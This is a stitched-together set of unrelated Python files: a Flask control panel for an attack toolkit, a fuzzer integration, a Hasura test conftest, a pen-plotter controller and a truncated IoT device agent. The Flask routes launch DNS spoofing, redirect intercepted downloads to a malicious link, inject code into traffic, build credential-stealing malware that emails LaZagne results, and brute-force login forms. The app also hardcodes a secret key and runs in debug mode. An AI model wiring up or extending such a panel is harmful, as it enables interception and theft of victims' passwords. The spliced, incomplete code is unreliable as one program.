@app.route('/crawl', methods=['GET', 'POST'])
def crawl():
global crawler
if not session.get('logged_in'):
flash("Unauthorized Access", "danger")
return redirect(url_for("login"))
else:
form = CrawlerForm(request.form)
if request.method == "POST" and form.validate():
seedurl = form.url.data
crawler = Crawler(seedurl)
def crawl_sites():
for url in crawler.crawled_urls:
crawler.user_output.append(">>>" +url)
print('>>>', url)
t = Thread(target = crawl_sites)
t.start()
results = 'Crawling...'
flash("Crawler Started Successfully", "success")
return render_template("crawler.html", form=form)
@app.route('/crawl_array', methods=['GET', 'POST'])
def crawl_array():
if crawler:
results = crawler.user_output
return jsonify(results=results)
else:
return ''
@app.route('/scan_array', methods=['GET', 'POST'])
def scan_array():
if scanner:
results = scanner.scan_results
return jsonify(results=results)
else:
# scanner not initialized yet
return ''
@app.route('/clear', methods=['GET', 'POST'])
def clear_sniffed_results():
packet_sniffer.results.clear()
if len(packet_sniffer.results) == 0:
return 'cleared'
return ''
@app.route('/restore_url', methods=['POST'])
def restore_url():
dns_spoof_attack.restore()
flash('URL Restored', 'success')
return ''
@app.route('/drop_connection', methods=['POST'])
def drop_connection():
dns_spoof_attack.drop_connection()
flash('Remote Connection Dropped Successfully', 'success')
return ''
@app.route('/restore_connection', methods=['POST'])
def restore_connection():
dns_spoof_attack.establish_connection()
flash('Remote Connection Restored Successfully', 'success')
return ''
@app.route('/dns', methods=['GET', 'POST'])
def dns_spoof():
if not session.get('logged_in'):
flash("Unauthorized Access", "danger")
return redirect(url_for("login"))
else:
form = DnsSpoofingForm(request.form)
if request.method == "POST" and form.validate():
try:
if not dns_spoof_attack.url:
dns_spoof_attack.set_forward_chain()
dns_spoof_attack.set_params(form.target_url.data, form.spoof_ip.data)
dns_spoof_attack.bind()
results = "Spoofing DNS response to: " + form.spoof_ip.data
else:
dns_spoof_attack.set_params(form.target_url.data, form.spoof_ip.data)
results = "Spoofing DNS response to: " + form.spoof_ip.data
flash('DNS Spoofing Was Successful', 'success')
except Exception as e:
print(e)
results = ""
flash('Operation Was Not Successful', 'danger')
return render_template("dns_spoof.html", form=form, results = [results])
return render_template("dns_spoof.html", form=form)
@app.route("/file", methods=['GET', 'POST'])
def file_interceptor():
if not session.get('logged_in'):
flash("Unauthorized Access", "danger")
return redirect(url_for("login"))
else:
form = FileInterceptorForm(request.form)
if request.method == "POST" and form.validate():
interceptor.set_file(form.evil_link.data)
interceptor.enable_forward_chain()
interceptor.bind()
results = [
'Interceptor started successfully...',
'All files will be redirected to: ',
form.evil_link.data
]
flash('File Interception Was Successful', 'success')
return render_template("file_interceptor.html", form=form, results=results)
return render_template("file_interceptor.html", form=form)
@app.route("/code", methods=['GET', 'POST'])
def code_injector():
if not session.get('logged_in'):
flash("Unauthorized Access", "danger")
return redirect(url_for("login"))
else:
form = CodeInjectorForm(request.form)
if request.method == "POST" and form.validate():
if 'remove' in request.form:
results = ''
injector.remove_injection()
flash('Injector Removed Successfully', 'success')
else:
results = ''
if not injector.injector_running:
injector.enable_forward_chain()
injector.set_injection(form.code.data)
injector.bind()
results = [
'Injector started successfully...'
]
flash('Code Injection Was Successful', 'success')
else:
results = [
'Injector modified successfully...'
]
injector.set_injection(form.code.data)
flash('Code Modification Was Successful', 'success')
return render_template("code_injector.html", form=form, results=results)
return render_template("code_injector.html", form=form)
@app.route("/malware", methods=['GET', 'POST'])
def malware():
if not session.get('logged_in'):
flash("Unauthorized Access", "danger")
return redirect(url_for("login"))
else:
form = MalwareForm(request.form)
results = ''
if request.method == "POST" and form.validate():
malware = Malware(form.email.data, form.password.data, form.download_link.data)
malware.create()
results = [
'Malware code created successfully...',
'LaZagne download link:--->' + form.download_link.data,
'If you don\'t receive an email, please retry in two minutes'
]
flash('Malware Created Successfully', 'success')
return render_template("malware.html", form=form, results=results)
@app.route("/steal", methods=['GET', 'POST'])
def password_stealer():
if not session.get('logged_in'):
flash("Unauthorized Access", "danger")
return redirect(url_for("login"))
else:
form = MalwareForm(request.form)
results = ''
if request.method == "POST" and form.validate():
malware = Malware(form.email.data, form.password.data)
malware.create_stealer()
results = [
'Password Stealer created successfully...',
'If you don\'t receive an email, please retry in two minutes'
]
flash('Password Stealer Created Successfully', 'success')
return render_template("password_stealer.html", form=form, results=results)
@app.route("/login", methods=['GET', 'POST'])
def login():
if session.get('logged_in'):
form = MainScreen(request.form)
return render_template("main_screen.html", form = form)
else:
form = LoginForm(request.form)
if request.method == "POST" and form.validate():
user = Users.query.filter_by(email=form.email.data).first()
if user:
if check_password_hash(user.password,form.password.data):
session['logged_in'] = True
session['logged_email'] = form.email.data
return redirect(url_for("main"))
else:
flash('Invalid Email Or Password', 'danger')
return redirect(url_for('login'))
else:
flash('Invalid Email Or Password', 'danger')
return redirect(url_for('login'))
return render_template("login.html", form=form)
@app.route("/dict", methods=['GET', 'POST'])
def dictionary_attack():
if not session.get('logged_in'):
flash("Unauthorized Access", "danger")
return redirect(url_for("login"))
else:
form = DictionaryForm(request.form)
if request.method == "POST" and form.validate():
results = brute_force_attack(form.url.data, form.username_field.data, form.pass_field.data, form.username_guess.data, form.submit_field.data)
if(results):
msg = "Attacked Successfully"
results = "Success..\n Password--->" + results
return render_template("dictionary_attack.html", form=form, msg=msg, results=[results])
else:
error = "Attack Was Not Successful"
return render_template("dictionary_attack.html", form=form, error= error)
return render_template("dictionary_attack.html", form=form)
@app.route("/register", methods=['GET', 'POST'])
def register():
if session.get('logged_in'):
form = MainScreen(request.form)
return render_template("main_screen.html", form = form)
else:
form = RegisterForm(request.form)
if request.method == "POST" and form.validate():
hashed_password = generate_password_hash(form.password.data, method='sha256')
new_user = Users(name=form.name.data, email=form.email.data, password=hashed_password)
db.session.add(new_user)
db.session.commit()
flash('You are registered successfully and can log in', 'success')
return redirect(url_for("login"))
return render_template("signup.html", form=form)
@app.route("/logout")
def logout():
session.clear()
return redirect(url_for("index"))
app.secret_key = "secret123"
app.run(debug=True)
|
fuzzer.py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Integration code for Eclipser fuzzer. Note that starting from v2.0, Eclipser
relies on AFL to perform random-based fuzzing."""
import os
import shutil
import threading
from fuzzers.aflplusplus import fuzzer as aflplusplus_fuzzer
def build():
"""Build benchmark."""
build_directory = os.getenv('OUT')
aflplusplus_fuzzer.build("tracepc", "cmplog")
shutil.copy('/afl/afl-fuzz', build_directory)
def afl_worker1(input_corpus, output_corpus, target_binary):
"""Run AFL worker instance."""
print('[afl_worker] Run AFL worker1')
aflplusplus_fuzzer.fuzz(input_corpus,
output_corpus,
target_binary,
flags=(['-S', 'afl-worker1']),
no_cmplog=True)
def afl_worker2(input_corpus, output_corpus, target_binary):
"""Run AFL worker instance."""
print('[afl_worker] Run AFL worker2')
aflplusplus_fuzzer.fuzz(input_corpus,
output_corpus,
target_binary,
flags=(['-S', 'afl-worker2']),
skip=True)
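# Run two AFL++ secondary instances in parallel threads over the same corpus: worker1 with cmplog disabled (no_cmplog=True) and worker2 with the wrapper's skip flag set.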
def fuzz(input_corpus, output_corpus, target_binary):
"""Run fuzzer."""
if not os.path.isdir(input_corpus):
raise Exception("invalid input directory")
afl_args = (input_corpus, output_corpus, target_binary)
print('[fuzz] Running AFL worker 1')
afl_worker_thread = threading.Thread(target=afl_worker1, args=afl_args)
afl_worker_thread.start()
print('[fuzz] Running AFL worker 2')
afl_worker2_thread = threading.Thread(target=afl_worker2, args=afl_args)
afl_worker2_thread.start()
print('[fuzz] Now waiting for threads to finish...')
afl_worker_thread.join()
afl_worker2_thread.join()
|
conftest.py
|
import pytest
import time
from context import HGECtx, HGECtxError, ActionsWebhookServer, EvtsWebhookServer, HGECtxGQLServer, GQLWsClient, PytestConf
import threading
import random
from datetime import datetime
import sys
import os
from collections import OrderedDict
def pytest_addoption(parser):
parser.addoption(
"--hge-urls",
metavar="HGE_URLS",
help="csv list of urls for graphql-engine",
required=False,
nargs='+'
)
parser.addoption(
"--pg-urls", metavar="PG_URLS",
help="csv list of urls for connecting to Postgres directly",
required=False,
nargs='+'
)
parser.addoption(
"--hge-key", metavar="HGE_KEY", help="admin secret key for graphql-engine", required=False
)
parser.addoption(
"--hge-webhook", metavar="HGE_WEBHOOK", help="url for graphql-engine's access control webhook", required=False
)
parser.addoption(
"--test-webhook-insecure", action="store_true",
help="Run Test cases for insecure https webhook"
)
parser.addoption(
"--hge-jwt-key-file", metavar="HGE_JWT_KEY_FILE", help="File containting the private key used to encode jwt tokens using RS512 algorithm", required=False
)
parser.addoption(
"--hge-jwt-conf", metavar="HGE_JWT_CONF", help="The JWT conf", required=False
)
parser.addoption(
"--test-cors", action="store_true",
required=False,
help="Run testcases for CORS configuration"
)
parser.addoption(
"--test-ws-init-cookie",
metavar="read|noread",
required=False,
help="Run testcases for testing cookie sending over websockets"
)
parser.addoption(
"--test-metadata-disabled", action="store_true",
help="Run Test cases with metadata queries being disabled"
)
parser.addoption(
"--test-graphql-disabled", action="store_true",
help="Run Test cases with GraphQL queries being disabled"
)
parser.addoption(
"--test-hge-scale-url",
metavar="<url>",
required=False,
help="Run testcases for horizontal scaling"
)
parser.addoption(
"--test-allowlist-queries", action="store_true",
help="Run Test cases with allowlist queries enabled"
)
parser.addoption(
"--test-logging",
action="store_true",
default=False,
required=False,
help="Run testcases for logging"
)
parser.addoption(
"--test-jwk-url",
action="store_true",
default=False,
required=False,
help="Run testcases for JWK url behaviour"
)
parser.addoption(
"--accept",
action="store_true",
default=False,
required=False,
help="Accept any failing test cases from YAML files as correct, and write the new files out to disk."
)
parser.addoption(
"--skip-schema-teardown",
action="store_true",
default=False,
required=False,
help="""
Skip tearing down the schema/Hasura metadata after tests. This option may result in test failures if the schema
has to change between the tests being run
"""
)
parser.addoption(
"--skip-schema-setup",
action="store_true",
default=False,
required=False,
help="""
Skip setting up schema/Hasura metadata before tests.
This option may result in test failures if the schema has to change between the tests being run
"""
)
parser.addoption(
"--avoid-error-message-checks",
action="store_true",
default=False,
required=False,
help="""
When set, this option ignores disparities in error messages between the expected and actual outputs.
Used mainly in version upgrade/downgrade tests, where the error messages may change
"""
)
parser.addoption(
"--collect-upgrade-tests-to-file",
metavar="<path>",
required=False,
help="When used along with collect-only, it will write the list of upgrade tests into the file specified"
)
parser.addoption(
"--test-unauthorized-role",
action="store_true",
help="Run testcases for unauthorized role",
)
#By default,
#1) Set default parallelism to one
#2) Set test grouping to by filename (--dist=loadfile)
def pytest_cmdline_preparse(config, args):
worker = os.environ.get('PYTEST_XDIST_WORKER')
if 'xdist' in sys.modules and not worker: # pytest-xdist plugin
num = 1
args[:] = ["-n" + str(num),"--dist=loadfile"] + args
def pytest_configure(config):
# Pytest has removed the global pytest.config
# As a solution we are going to store it in PytestConf.config
PytestConf.config = config
if is_help_option_present(config):
return
if is_master(config):
if not config.getoption('--hge-urls'):
print("hge-urls should be specified")
if not config.getoption('--pg-urls'):
print("pg-urls should be specified")
config.hge_url_list = config.getoption('--hge-urls')
config.pg_url_list = config.getoption('--pg-urls')
config.hge_ctx_gql_server = HGECtxGQLServer(config.hge_url_list)
if config.getoption('-n', default=None):
xdist_threads = config.getoption('-n')
assert xdist_threads <= len(config.hge_url_list), "Not enough hge_urls specified, Required " + str(xdist_threads) + ", got " + str(len(config.hge_url_list))
assert xdist_threads <= len(config.pg_url_list), "Not enough pg_urls specified, Required " + str(xdist_threads) + ", got " + str(len(config.pg_url_list))
random.seed(datetime.now())
@pytest.hookimpl()
def pytest_report_collectionfinish(config, startdir, items):
"""
Collect server upgrade tests to the given file
"""
tests_file = config.getoption('--collect-upgrade-tests-to-file')
sep=''
tests=OrderedDict()
if tests_file:
def is_upgrade_test(item):
# Check that the allow_server_upgrade_test marker is present
# and the skip_server_upgrade_test marker is not
return item.get_closest_marker('allow_server_upgrade_test') \
and not item.get_closest_marker('skip_server_upgrade_test')
with open(tests_file,'w') as f:
upgrade_items = filter(is_upgrade_test, items)
for item in upgrade_items:
# This test should be run separately,
# since its schema setup has function scope
if 'per_method_tests_db_state' in item.fixturenames:
tests[item.nodeid] = True
elif any([ (x in item.fixturenames)
for x in
[ 'per_class_tests_db_state',
'per_class_db_schema_for_mutation_tests'
]
]):
# For this test, schema setup has class scope
# We can run a class of these tests at a time
tests[item.parent.nodeid] = True
# Otherwise assume the test can only be run separately
else:
tests[item.nodeid] = True
for test in tests.keys():
f.write(test + '\n')
return ''
@pytest.hookimpl(optionalhook=True)
def pytest_configure_node(node):
if is_help_option_present(node.config):
return
# Pytest has removed the global pytest.config
node.slaveinput["hge-url"] = node.config.hge_url_list.pop()
node.slaveinput["pg-url"] = node.config.pg_url_list.pop()
def pytest_unconfigure(config):
if is_help_option_present(config):
return
config.hge_ctx_gql_server.teardown()
@pytest.fixture(scope='module')
def hge_ctx(request):
config = request.config
print("create hge_ctx")
if is_master(config):
hge_url = config.hge_url_list[0]
else:
hge_url = config.slaveinput["hge-url"]
if is_master(config):
pg_url = config.pg_url_list[0]
else:
pg_url = config.slaveinput["pg-url"]
try:
hge_ctx = HGECtx(hge_url, pg_url, config)
except HGECtxError as e:
assert False, "Error from hge_cxt: " + str(e)
# TODO this breaks things (https://github.com/pytest-dev/pytest-xdist/issues/86)
# so at least make sure the real error gets printed (above)
pytest.exit(str(e))
yield hge_ctx # provide the fixture value
print("teardown hge_ctx")
hge_ctx.teardown()
time.sleep(1)
@pytest.fixture(scope='class')
def evts_webhook(request):
webhook_httpd = EvtsWebhookServer(server_address=('127.0.0.1', 5592))
web_server = threading.Thread(target=webhook_httpd.serve_forever)
web_server.start()
yield webhook_httpd
webhook_httpd.shutdown()
webhook_httpd.server_close()
web_server.join()
@pytest.fixture(scope='module')
def actions_fixture(hge_ctx):
pg_version = hge_ctx.pg_version
if pg_version < 100000: # version less than 10.0
pytest.skip('Actions are not supported on Postgres version < 10')
# Start actions' webhook server
webhook_httpd = ActionsWebhookServer(hge_ctx, server_address=('127.0.0.1', 5593))
web_server = threading.Thread(target=webhook_httpd.serve_forever)
web_server.start()
yield webhook_httpd
webhook_httpd.shutdown()
webhook_httpd.server_close()
web_server.join()
@pytest.fixture(scope='class')
def scheduled_triggers_evts_webhook(request):
webhook_httpd = EvtsWebhookServer(server_address=('127.0.0.1', 5594))
web_server = threading.Thread(target=webhook_httpd.serve_forever)
web_server.start()
yield webhook_httpd
webhook_httpd.shutdown()
webhook_httpd.server_close()
web_server.join()
@pytest.fixture(scope='class')
def gql_server(request, hge_ctx):
server = HGECtxGQLServer(request.config.getoption('--pg-urls'), 5991)
yield server
server.teardown()
@pytest.fixture(scope='class')
def ws_client(request, hge_ctx):
"""
This fixture provides an Apollo GraphQL websockets client
"""
client = GQLWsClient(hge_ctx, '/v1/graphql')
time.sleep(0.1)
yield client
client.teardown()
@pytest.fixture(scope='class')
def per_class_tests_db_state(request, hge_ctx):
"""
Set up the database state for select queries.
Has a class-level scope, since select queries do not change database state.
Expects either a `dir()` method which provides the directory
with `setup.yaml` and `teardown.yaml` files,
or class variables `setup_files` and `teardown_files` that provide
the lists of setup and teardown files respectively.
"""
yield from db_state_context(request, hge_ctx)
@pytest.fixture(scope='function')
def per_method_tests_db_state(request, hge_ctx):
"""
This fixture sets up the database state for metadata operations.
Has a function-level scope, since metadata operations may change both the schema and the data.
Class method/variable requirements are similar to those of the per_class_tests_db_state fixture.
"""
yield from db_state_context(request, hge_ctx)
@pytest.fixture(scope='class')
def per_class_db_schema_for_mutation_tests(request, hge_ctx):
"""
This fixture sets up the database schema for mutations.
It has a class-level scope, since mutations do not change the schema.
Expects either a `dir()` class method which provides the directory with `schema_setup.yaml` and `schema_teardown.yaml` files,
or variables `schema_setup_files` and `schema_teardown_files`
that provide the lists of setup and teardown files respectively
"""
yield from db_context_with_schema_common(
request, hge_ctx, 'schema_setup_files', 'schema_setup.yaml', 'schema_teardown_files', 'schema_teardown.yaml', True
)
@pytest.fixture(scope='function')
def per_method_db_data_for_mutation_tests(request, hge_ctx, per_class_db_schema_for_mutation_tests):
"""
This fixture sets up the data for mutations.
Has a function-level scope, since mutations may change data.
Having just the setup file(s) or just the teardown file(s) is allowed.
Expects either a `dir()` class method which provides the directory with `values_setup.yaml` and/or `values_teardown.yaml` files.
The class may provide a `values_setup_files` variable, which contains the list of data setup files,
or a `values_teardown_files` variable, which provides the list of data teardown files.
"""
yield from db_context_common(
request, hge_ctx, 'values_setup_files', 'values_setup.yaml',
'values_teardown_files', 'values_teardown.yaml',
False, False, False
)
def db_state_context(request, hge_ctx):
yield from db_context_with_schema_common(
request, hge_ctx, 'setup_files', 'setup.yaml', 'teardown_files',
'teardown.yaml', True
)
def db_context_with_schema_common(
request, hge_ctx, setup_files_attr, setup_default_file,
teardown_files_attr, teardown_default_file, check_file_exists=True):
(skip_setup, skip_teardown) = [
request.config.getoption('--' + x)
for x in ['skip-schema-setup', 'skip-schema-teardown']
]
yield from db_context_common(
request, hge_ctx, setup_files_attr, setup_default_file,
teardown_files_attr, teardown_default_file,
check_file_exists, skip_setup, skip_teardown
)
def db_context_common(
request, hge_ctx, setup_files_attr, setup_default_file,
teardown_files_attr, teardown_default_file,
check_file_exists=True, skip_setup=True, skip_teardown=True ):
def get_files(attr, default_file):
files = getattr(request.cls, attr, None)
if not files:
files = os.path.join(request.cls.dir(), default_file)
return files
setup = get_files(setup_files_attr, setup_default_file)
teardown = get_files(teardown_files_attr, teardown_default_file)
yield from setup_and_teardown(request, hge_ctx, setup, teardown, check_file_exists, skip_setup, skip_teardown)
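# Illustrative sketch (hypothetical class, not part of this test suite) of the
# class-level convention db_context_common resolves above: a test class either
# sets the *_files attributes explicitly, or provides a dir() classmethod and
# lets the default file names (e.g. setup.yaml/teardown.yaml) apply.
class _ExampleDBStateConvention:
    setup_files = ['queries/example/setup.yaml']       # explicit list of files ...
    teardown_files = 'queries/example/teardown.yaml'   # ... or a single path
    @classmethod
    def dir(cls):
        # only consulted when the *_files attributes above are missing
        return 'queries/example'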
def setup_and_teardown(request, hge_ctx, setup_files, teardown_files, check_file_exists=True, skip_setup=False, skip_teardown=False):
def assert_file_exists(f):
assert os.path.isfile(f), 'Could not find file ' + f
if check_file_exists:
for o in [setup_files, teardown_files]:
run_on_elem_or_list(assert_file_exists, o)
def v1q_f(f):
if os.path.isfile(f):
st_code, resp = hge_ctx.v1q_f(f)
assert st_code == 200, resp
if not skip_setup:
run_on_elem_or_list(v1q_f, setup_files)
yield
# Teardown anyway if any of the tests have failed
if request.session.testsfailed > 0 or not skip_teardown:
run_on_elem_or_list(v1q_f, teardown_files)
def run_on_elem_or_list(f, x):
if isinstance(x, str):
return [f(x)]
elif isinstance(x, list):
return [f(e) for e in x]
def is_help_option_present(config):
return any([
config.getoption(x)
for x in ['--fixtures','--help', '--collect-only']
])
def is_master(config):
"""True if the code running the given pytest.config object is running in a xdist master
node or not running xdist at all.
"""
return not hasattr(config, 'slaveinput')
|
controller.py
|
#!/usr/bin/python
from Adafruit_MotorHAT import Adafruit_MotorHAT, Adafruit_DCMotor, Adafruit_StepperMotor
import time
import atexit
import threading
import random
import argparse
import math
import msgpackrpc
import socket
import RPi.GPIO as GPIO
PWM_PIN = 22
INCREASE = 1
DECREASE = -1
def stepper_worker(stepper, numsteps, direction, style):
stepper.step(numsteps, direction, style)
def tick(stepper, direction, steps=1):
worker = threading.Thread(target=stepper_worker, args=(stepper, steps, direction, Adafruit_MotorHAT.DOUBLE))
worker.start()
worker.join()
def tick_async(stepper, direction, steps=1):
worker = threading.Thread(target=stepper_worker, args=(stepper, steps, direction, Adafruit_MotorHAT.DOUBLE))
worker.start()
return worker
class PlotterInterface(object):
def __init__(self, left, right, servo):
self.left = left
self.right = right
self.total_left = 0
self.total_right = 0
self.servo = servo
def pen_down(self):
self.servo.start(20/10)
time.sleep(.25)
self.servo.ChangeDutyCycle(0)
print "pendown"
def pen_up(self):
self.servo.start(15/10)
time.sleep(.25)
self.servo.ChangeDutyCycle(0)
print "penup"
def tick_right(self, direction):
if direction == INCREASE:
tick(self.right, Adafruit_MotorHAT.FORWARD)
self.total_right += 1
elif direction == DECREASE:
tick(self.right, Adafruit_MotorHAT.BACKWARD)
self.total_right -= 1
def tick_left(self, direction):
if direction == INCREASE:
tick(self.left, Adafruit_MotorHAT.BACKWARD)
self.total_left += 1
elif direction == DECREASE:
tick(self.left, Adafruit_MotorHAT.FORWARD)
self.total_left -= 1
def tick(self, left, right):
worker1 = threading.Thread()
worker2 = threading.Thread()
# Left
if left == INCREASE:
worker1 = tick_async(self.left, Adafruit_MotorHAT.BACKWARD)
self.total_left += 1
elif left == DECREASE:
worker1 = tick_async(self.left, Adafruit_MotorHAT.FORWARD)
self.total_left -= 1
# Right
if right == INCREASE:
worker2 = tick_async(self.right, Adafruit_MotorHAT.FORWARD)
self.total_right += 1
elif right == DECREASE:
worker2 = tick_async(self.right, Adafruit_MotorHAT.BACKWARD)
self.total_right -= 1
worker1.join()
worker2.join()
def reset(self):
print "Resetting...(%s, %s)" % (self.total_left, self.total_right)
if self.total_left > 0:
tick(self.left, Adafruit_MotorHAT.FORWARD, steps=self.total_left)
else:
tick(self.left, Adafruit_MotorHAT.BACKWARD, steps=-self.total_left)
if self.total_right > 0:
tick(self.right, Adafruit_MotorHAT.BACKWARD, steps=self.total_right)
else:
tick(self.right, Adafruit_MotorHAT.FORWARD, steps=-self.total_right)
self.total_left = self.total_right = 0
def turnOffMotors():
mh.getMotor(1).run(Adafruit_MotorHAT.RELEASE)
mh.getMotor(2).run(Adafruit_MotorHAT.RELEASE)
mh.getMotor(3).run(Adafruit_MotorHAT.RELEASE)
mh.getMotor(4).run(Adafruit_MotorHAT.RELEASE)
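# Client-side sketch (illustrative; assumes the msgpack-rpc-python Client API).
# The server started below exposes PlotterInterface over msgpack-rpc on
# localhost:18800, so a remote caller could drive the plotter like this:
def _drive_plotter_sketch(host="localhost", port=18800):
    client = msgpackrpc.Client(msgpackrpc.Address(host, port))
    client.call("pen_down")
    client.call("tick", INCREASE, DECREASE)  # one step: left up, right down
    client.call("pen_up")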
if __name__ == '__main__':
# create a default object, no changes to I2C address or frequency
mh = Adafruit_MotorHAT()
atexit.register(turnOffMotors)
stepper_left = mh.getStepper(200, 1) # 200 steps/rev, motor port #1
stepper_right = mh.getStepper(200, 2) # 200 steps/rev, motor port #2
stepper_left.setSpeed(200) # 200 RPM
stepper_right.setSpeed(200) # 200 RPM
st1 = threading.Thread(target=stepper_worker, args=(stepper_left, 400, Adafruit_MotorHAT.FORWARD, Adafruit_MotorHAT.DOUBLE))
st1.start()
st2 = threading.Thread(target=stepper_worker, args=(stepper_right, 400, Adafruit_MotorHAT.BACKWARD, Adafruit_MotorHAT.DOUBLE))
st2.start()
# Wait for it to center
while st1.isAlive() or st2.isAlive():
time.sleep(1)
# Configure the servo PWM output pin
GPIO.setmode(GPIO.BCM)
GPIO.setup(PWM_PIN, GPIO.OUT)
# Pen servo PWM (10Hz)
p = GPIO.PWM(PWM_PIN, 10)
server = msgpackrpc.Server(PlotterInterface(stepper_left, stepper_right, p))
server.listen(msgpackrpc.Address("localhost", 18800))
server.start()
|
main.py
|
INTERVAL = 5
MSG_TXT = '{{"device_id": {device_id}, "critical": {level}, "pressure": {pressure}, "power_state": {power_state}}}'
ERROR_TXT = '{{"device_id": {device_id}, "critical": {level}, "ERROR_0": {ERROR_0}, "ERROR_1": {ERROR_1}, "ERROR_2": {ERROR_2}}}'
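# For reference, MSG_TXT above renders to JSON text like (values illustrative):
#   {"device_id": 1, "critical": 0, "pressure": 2.5, "power_state": 1}
# and ERROR_TXT to:
#   {"device_id": 1, "critical": 1, "ERROR_0": 1, "ERROR_1": 0, "ERROR_2": 0}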
RECEIVED_MESSAGES = 0
import logging
from agent import Agent
the_device = Agent()
def main():
# Check for devices online
DEVICES_ONLINE = propeties.get_instances()
DEVICE_CONNECTION_STRING = DEVICE_KEYS[DEVICES_ONLINE]
# OBTAIN CONNECTION KEY
if DEVICE_CONNECTION_STRING is not None:
CONNECTION_STRING = DEVICE_CONNECTION_STRING
the_device.set_device_id(DEVICES_ONLINE)
else:
print('Provide connection string in connection_strings.py file.')
exit()
# Connect, start threads and send messages
try:
# Set up the connection to device
client = iothub_client_init(CONNECTION_STRING)
loop = asyncio.get_event_loop()
# Announce and increment devices online
print ( "IoT Hub device sending periodic messages, press Ctrl-C to exit" )
propeties.add_instance()
# Send initial report in case something has changed
twin_send_report(client)
# CREATE LISTENERS =================================================================
# Start a thread to listen to DeviceTwin Desired updates
twin_update_listener_thread = threading.Thread(target=twin_update_listener, args=(client,))
twin_update_listener_thread.daemon = True
twin_update_listener_thread.start()
# Start a thread to listen to C2D messages
message_listener_thread = threading.Thread(target=message_listener, args=(client,))
message_listener_thread.daemon = True
message_listener_thread.start()
# Start a thread to listen to Direct Methods
device_method_thread = threading.Thread(target=device_method_listener, args=(client,))
device_method_thread.daemon = True
device_method_thread.start()
# =================================================================================
# Message loop
while the_device.power_state == 1:
# Get the_device properties
pw_st = 1
if not the_device.power_state:
pw_st = 0
press = the_device.get_pressure()
# Build the message with simulated telemetry values.
msg_txt_formatted = MSG_TXT.format(device_id = the_device.device_id,level=the_device.get_alarm_state_int(),pressure=press, power_state=pw_st)
message = Message(msg_txt_formatted)
message.custom_properties['level'] = 'storage'
# Check for errors
if the_device.get_alarm_state():
errors = the_device.get_errors_int()
error_txt_formatted = ERROR_TXT.format(device_id = the_device.device_id, level=the_device.get_alarm_state_int(), ERROR_0=int(errors[0]), ERROR_1=int(errors[1]), ERROR_2=int(errors[2]))
error_message = Message(error_txt_formatted)
error_message.custom_properties['level'] = 'critical'
# Send the message.
print( "Sending ERROR_MESSAGE: {}".format(error_message) )
client.send_message(error_message)
#loop.run_until_complete(send_event(DEVICE_CONNECTION_STRING))
dev_name = 'python_agent_{id}'.format(id=the_device.device_id)
print(dev_name)
pload = {
'ConnectionDeviceId': dev_name,
'MethodName': 'pump_switch'
}
url = 'https://csharpwatering.azurewebsites.net/api/HttpTriggerKox'
r = requests.post(url, json=pload)
# Send the message.
print( "Sending message: {}".format(message) )
client.send_message(message)
# Sleep
time.sleep(INTERVAL)
# Stop device and delete it from online
except KeyboardInterrupt:
print ( "Agent instance - STOPPED..." )
async def send_event(DEVICE_CONNECTION_STRING):
producer = EventHubProducerClient.from_connection_string(conn_str = EVENT_HUB_KEY, eventhub_name="thehub")
try:
event_data_batch = await producer.create_batch()
new_event = EventData('ALARM RAISED')
new_event.properties['device_id'] = the_device.device_id
new_event.properties['connection_string'] = DEVICE_CONNECTION_STRING
print(new_event.properties)
event_data_batch.add(new_event)
await producer.send_batch(event_data_batch)
finally:
# Close down the producer handler.
print('Should be sent.')
await producer.close()
# Device Twin listener waiting for Desired properties
def twin_update_listener(client):
print('Listening to Twin Updated Async')
while True:
patch = client.receive_twin_desired_properties_patch() # blocking call
print("Twin patch received:")
print(patch)
# patch is a dictionary type
the_device.set_pressure( float(patch['pressure']) )
#the_device.power_state = patch['power_state']
twin_send_report(client)
time.sleep(INTERVAL)
def message_listener(client):
global RECEIVED_MESSAGES
while True:
message = client.receive_message()
RECEIVED_MESSAGES += 1
print("\nMessage received:")
#print data and both system and application (custom) properties
for property in vars(message).items():
print (" {0}".format(property))
print( "Total calls received: {}".format(RECEIVED_MESSAGES))
print()
time.sleep(INTERVAL)
# Sends data to Device Twin as Reported
def twin_send_report(client):
print ( "Sending data as reported property..." )
# Prepare data to send
reported_patch = {"pressure": the_device.pressure, "power_state": the_device.power_state, "ERROR_0": the_device.error_0, "ERROR_1": the_device.error_1, "ERROR_2": the_device.error_2}
# Send the data
client.patch_twin_reported_properties(reported_patch)
# Announce it
print ( "Reported properties updated" )
# Listens to Direct Method calls and processes them
def device_method_listener(device_client):
global the_device
while True:
time.sleep(INTERVAL)
method_request = device_client.receive_method_request()
print (
"\nMethod callback called with:\nmethodName = {method_name}\npayload = {payload}".format(
method_name=method_request.name,
payload=method_request.payload
)
)
# SET_PRESSURE
if method_request.name == "set_pressure":
try:
the_device.set_pressure(desired_pressure = float(method_request.payload))
twin_send_report(device_client)
except ValueError:
response_payload = {"Response": "Invalid parameter"}
response_status = 400
else:
response_payload = {"Response": "Executed direct method {}".format(method_request.name)}
response_status = 200
# PUMP_SWITCH
elif method_request.name == "pump_switch":
try:
the_device.pump_switch()
twin_send_report(device_client)
decrement_online_devices(True)
except ValueError:
response_payload = {"Response": "Invalid parameter"}
response_status = 400
else:
response_payload = {"Response": "Executed direct method {}".format(method_request.name)}
response_status = 200
# RAISE_ERROR
elif method_request.name == "raise_error":
try:
the_device.raise_error(error_nr = int((method_request.payload)))
twin_send_report(device_client)
except ValueError:
response_payload = {"Response": "Invalid parameter"}
response_status = 400
else:
response_payload = {"Response": "Executed direct method {}".format(method_request.name)}
response_status = 200
# ALARM_RESET
elif method_request.name == "alarm_reset":
try:
the_device.alarm_reset()
twin_send_report(device_client)
except ValueError:
response_payload = {"Response": "Invalid parameter"}
response_status = 400
else:
response_payload = {"Response": "Executed direct method {}".format(method_request.name)}
response_status = 200
else:
response_payload = {"Response": "Direct method {} not defined".format(method_request.name)}
response_status = 404
method_response = MethodResponse(method_request.request_id, response_status, payload=response_payload)
device_client.send_method_response(method_response)
# Creates the connection to the device
def iothub_client_init(CONNECTION_STRING):
# Create an IoT Hub client
client = IoTHubDeviceClient.create_from_connection_string(CONNECTION_STRING)
return client
# Get number of devices in the hub
def get_amount_of_devices():
# Create connection to the hub
